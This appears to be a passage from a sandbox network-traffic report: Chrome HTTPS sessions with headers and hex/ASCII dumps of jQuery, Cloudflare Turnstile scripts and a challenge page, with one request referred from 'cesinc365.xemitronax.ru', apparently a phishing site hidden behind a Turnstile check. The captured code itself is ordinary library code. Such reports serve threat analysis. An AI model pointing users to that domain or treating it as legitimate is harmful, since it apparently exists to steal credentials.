                                                          2025-01-09 20:12:15 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                          2025-01-09 20:12:15 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449752104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:16 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:16 UTC471INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:16 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 47521
                                                          Connection: close
                                                          accept-ranges: bytes
                                                          last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                          access-control-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714c8bb5f6a4f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:16 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449753104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:16 UTC803OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/ HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: iframe
                                                          Referer: https://cesinc365.xemitronax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:16 UTC1362INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 26635
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                          cross-origin-embedder-policy: require-corp
                                                          cross-origin-opener-policy: same-origin
                                                          cross-origin-resource-policy: cross-origin
                                                          origin-agent-cluster: ?1
                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          referrer-policy: same-origin
                                                          document-policy: js-profiling
                                                          2025-01-09 20:12:16 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 37 31 34 63 38 66 62 32 37 63 33 32 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                          Data Ascii: Server: cloudflareCF-RAY: 8ff714c8fb27c325-EWRalt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:16 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
